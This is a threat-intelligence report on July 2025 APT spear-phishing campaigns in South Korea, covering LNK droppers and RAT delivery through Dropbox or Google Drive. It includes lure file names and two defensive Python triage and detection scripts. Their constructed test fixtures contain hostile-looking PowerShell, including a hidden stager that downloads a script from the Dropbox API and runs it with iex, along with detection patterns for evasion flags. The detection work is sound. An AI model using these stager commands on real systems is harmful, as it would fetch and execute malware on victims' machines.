July 2025 APT Attack Trends Report (South Korea)
Overview
AhnLab has been using AhnLab Smart Defense (ASD) to monitor advanced persistent threat (APT) attacks against targets in Korea. This report covers the types and statistics of APT attacks in Korea during July 2025 and the characteristics of each type.

Figure 1. July 2025 statistics on APT attacks in Korea
Most APT attacks identified in Korea were spread through spear phishing. In particular, in July 2025, attacks using LNK files within spear phishing campaigns accounted for the largest proportion. Additionally, watering hole attacks have been observed, where code exploiting specific product vulnerabilities is inserted into web pages.
Trends of APT Attacks in Korea
The cases and characteristics of each APT attack type identified in July 2025 are as follows.
1) Spear Phishing
Spear phishing is a type of phishing attack against specific individuals or groups. Unlike ordinary phishing attacks, the threat actor conducts reconnaissance before launching the attack to collect information on and learn about the targets. Because the threat actor crafts the phishing emails using the collected information, recipients are highly likely to believe they come from a trusted source. There are also cases where the sender's address is manipulated through email spoofing. Most spear phishing attacks include malicious attachments or links that lure the user into opening them.
Types distributed using this technique are as follows.
1.1 Attacks Using LNK Files
Type A
This type involves a compressed CAB file containing multiple malicious scripts used to exfiltrate information and download additional malware. The distributed LNK file contains a malicious PowerShell command that carves the CAB file and a decoy document, both embedded in the LNK file itself, and writes them to the user's PC. The CAB file is then decompressed, and the script files inside (bat, ps1, vbs, etc.) are executed. These scripts can perform malicious behaviors such as exfiltrating information from the user's PC and downloading additional files.
The confirmed file names are as follows.
| File Name |
| --- |
| Notice on Submission of Explanation for Unreported Source of Funds.hwp.lnk |
| Attachment1.VentureInvestmentCertificate(Form).hwp.lnk |
| KoreaBlockchainAssociation_Expert Opinion Survey for Improving Blockchain and Digital Asset Regulations.docx.lnk |
| 1. Overseas Financial Account Report.hwp.lnk |
Table 1. Confirmed file names
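The Type A chain above depends on the LNK's own PowerShell arguments reading the .lnk back from disk and carving a CAB and a decoy out of it. The following triage script, an added example that is not AhnLab's tooling, parses the shell-link StringData to recover those arguments, then carves any embedded CAB (sized from the CFHEADER cbCabinet field) and OLE decoy (the HWP 5.x/legacy Office container). The sample LNK is constructed in the script, and the assumption that the decoy runs to end-of-file is a simplification; real droppers take the decoy's offset and length from the PowerShell command.

```python
"""Triage helper for the Type A chain: an LNK whose PowerShell arguments carve a
CAB archive and a decoy document out of the .lnk file itself.
Added example, not AhnLab tooling; the sample LNK below is constructed."""
import re
import struct

LNK_MAGIC = b"\x4c\x00\x00\x00"                              # HeaderSize = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
CAB_MAGIC = b"MSCF"
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")   # HWP 5.x / legacy Office = OLE compound file

# LinkFlags bits (MS-SHLLINK 2.1.1); StringData fields appear in this fixed order
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relpath"), (0x10, "workdir"),
                 (0x20, "args"), (0x40, "icon"))


def parse_lnk_strings(blob: bytes) -> dict:
    """Skip header/IDList/LinkInfo and return the StringData fields (args included)."""
    if blob[:4] != LNK_MAGIC or blob[4:20] != LNK_CLSID:
        raise ValueError("not a shell link (bad header size or CLSID)")
    flags = struct.unpack_from("<I", blob, 0x14)[0]
    pos = 0x4C
    if flags & HAS_IDLIST:
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]   # IDListSize + IDList
    if flags & HAS_LINKINFO:
        pos += struct.unpack_from("<I", blob, pos)[0]       # LinkInfoSize counts itself
    width = 2 if flags & IS_UNICODE else 1
    fields = {}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", blob, pos)[0]       # CountCharacters, no NUL
        raw = blob[pos + 2:pos + 2 + count * width]
        pos += 2 + count * width
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return fields


def carve_payloads(blob: bytes) -> dict:
    """Find an embedded CAB (length from CFHEADER.cbCabinet) and an OLE decoy."""
    found = {}
    i = blob.find(CAB_MAGIC)
    if i != -1:
        cb_cabinet = struct.unpack_from("<I", blob, i + 8)[0]   # offset 8 in CFHEADER
        found["cab"] = blob[i:i + cb_cabinet]
    j = blob.find(OLE_MAGIC)
    if j != -1:
        # Real droppers take the decoy's offset/length from the PowerShell command;
        # assumption here: the decoy is the last blob and runs to end of file.
        found["decoy"] = blob[j:]
    return found


SUSPICIOUS_ARGS = re.compile(
    r"ReadAllBytes|\*\.lnk|-w(indowstyle)?\s+hidden|FromBase64String|\bexpand\b", re.I)


def triage(blob: bytes) -> dict:
    """Combine argument heuristics with carved payloads into a verdict."""
    args = parse_lnk_strings(blob).get("args", "")
    payloads = carve_payloads(blob)
    reasons = []
    if SUSPICIOUS_ARGS.search(args):
        reasons.append("self-reading or hidden PowerShell arguments")
    if "cab" in payloads:
        reasons.append("CAB archive embedded in LNK")
    if "decoy" in payloads:
        reasons.append("OLE document embedded in LNK")
    return {"suspicious": bool(reasons), "reasons": reasons,
            "payload_sizes": {k: len(v) for k, v in payloads.items()}}


def build_sample() -> bytes:
    """Constructed LNK: header + UTF-16 arguments + minimal CAB + OLE stub."""
    args = ('-windowstyle hidden -c "$f=gci *.lnk|?{$_.length -eq 0x1000};'
            '$b=[IO.File]::ReadAllBytes($f);expand $env:PUBLIC\\a.cab"')
    header = bytearray(0x4C)
    header[:4] = LNK_MAGIC
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 0x14, 0x20 | IS_UNICODE)   # HasArguments | IsUnicode
    string_data = struct.pack("<H", len(args)) + args.encode("utf-16-le")
    cab_header = bytearray(36)                                 # minimal CFHEADER
    cab_header[:4] = CAB_MAGIC
    cab_body = b"\x00" * 12
    struct.pack_into("<I", cab_header, 8, len(cab_header) + len(cab_body))  # cbCabinet = 48
    decoy = OLE_MAGIC + b"\x00" * 24
    return bytes(header) + string_data + bytes(cab_header) + cab_body + decoy


if __name__ == "__main__":
    print(triage(build_sample()))
```

Run it against a quarantined .lnk by passing the file's bytes to `triage()`. An LNK whose arguments enumerate `*.lnk` and call `ReadAllBytes`, or which carries an MSCF or OLE header past the StringData, has no legitimate reason to exist and is worth detonating in a sandbox regardless of the decoy's filename.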
Type B
This type ultimately executes RAT malware. It is mainly distributed as a compressed archive together with legitimate files. The distributed LNK file contains a malicious PowerShell command that uses the Dropbox API or Google Drive to download additional scripts and an obfuscated RAT to a writable location on the user's PC such as %PUBLIC%. The RAT then carries out the threat actor's commands, such as keylogging and taking screenshots. The identified RAT types are XenoRAT and RoKRAT.
The confirmed file names are as follows.
| File Name |
| --- |
| (Monthly kima) 3-1 ai War Situation Ideal Battlefield Leadership Development Direction (Final).lnk |
| Week 3 of July 2025 International Security and Military Defense Situation (Vol. 363).lnk |
| [Submission and Field Investigation Guide].lnk |
| Research on the Political Control Failure of the National Intelligence Service |
| Operation of Academy for the Successful Settlement of North Korean Defectors in South Korea.lnk |
Table 2. Confirmed file names
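The Type B chain is easiest to catch at the PowerShell stage, where the stager has to name a cloud-storage download endpoint, present a token, and write into a world-writable path before running what it fetched. The following detection logic, an added example rather than an AhnLab rule, scores ScriptBlock logging text (Event ID 4104) against those behaviours and flags a block only when a Dropbox API or Google Drive fetch is corroborated by at least two more indicators, so a lone administrator downloading a shared file does not fire. The three events are constructed for the example, not captured from an incident.

```python
"""Detection for the Type B pattern in PowerShell ScriptBlock logging text
(Event ID 4104): a stager that pulls follow-on scripts or a RAT from the
Dropbox API or Google Drive and stages them under %PUBLIC%.
Added example, not AhnLab's rule; the events below are constructed."""
import re

INDICATORS = {
    "cloud_fetch": re.compile(
        r"dropboxapi\.com/2/files/download|drive\.google\.com/uc\?"
        r"|googleapis\.com/drive/v3/files/[^\s'\"]+\?alt=media", re.I),
    "bearer_token": re.compile(r"Authorization\s*[=:]\s*['\"]?Bearer\s+\S+", re.I),
    "public_staging": re.compile(r"\$env:PUBLIC|%PUBLIC%|C:\\Users\\Public", re.I),
    "in_memory_exec": re.compile(r"\b(iex|Invoke-Expression|FromBase64String)\b", re.I),
    "evasion_flags": re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass", re.I),
}


def indicators(script_text: str) -> list:
    """Names of the indicators that fire on one script block."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_text)]


def is_type_b(script_text: str) -> tuple:
    """Flag only when a cloud fetch is corroborated by two more behaviours,
    so an admin downloading a shared file is not a hit on its own."""
    hits = indicators(script_text)
    return ("cloud_fetch" in hits and len(hits) >= 3), hits


# Constructed 4104 script-block texts (not captured events)
SAMPLE_EVENTS = [
    {"id": 1, "script":
        "powershell -windowstyle hidden -nop -c \"$h=@{Authorization='Bearer sl.ABCDEF';"
        "'Dropbox-API-Arg'='{\"path\":\"/s.txt\"}'};"
        "iwr https://content.dropboxapi.com/2/files/download -Headers $h "
        "-OutFile $env:PUBLIC\\s.ps1; iex (gc $env:PUBLIC\\s.ps1 -raw)\""},
    {"id": 2, "script":
        "Invoke-WebRequest 'https://drive.google.com/uc?export=download&id=1AbC' "
        "-OutFile \"$HOME\\Documents\\report.xlsx\""},
    {"id": 3, "script": "Get-ChildItem C:\\Users\\Public\\Downloads | Remove-Item -Force"},
]


def hunt(events: list) -> list:
    """Return (event id, fired indicators) for each flagged script block."""
    out = []
    for ev in events:
        flagged, hits = is_type_b(ev["script"])
        if flagged:
            out.append((ev["id"], hits))
    return out


if __name__ == "__main__":
    for ev_id, hits in hunt(SAMPLE_EVENTS):
        print(f"event {ev_id}: {', '.join(hits)}")
```

Only the first event is flagged: it fetches from the Dropbox download endpoint with a bearer token, writes to `$env:PUBLIC`, and `iex`es the result under `-windowstyle hidden`. The Google Drive download to Documents and the cleanup of `C:\Users\Public\Downloads` each trip one indicator and stay below the threshold. ScriptBlock logging must be enabled for 4104 events to exist, and an obfuscated stager may split the endpoint string, so pair this with network telemetry for the same domains from `powershell.exe`.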
※ For more information, please refer to the attached file.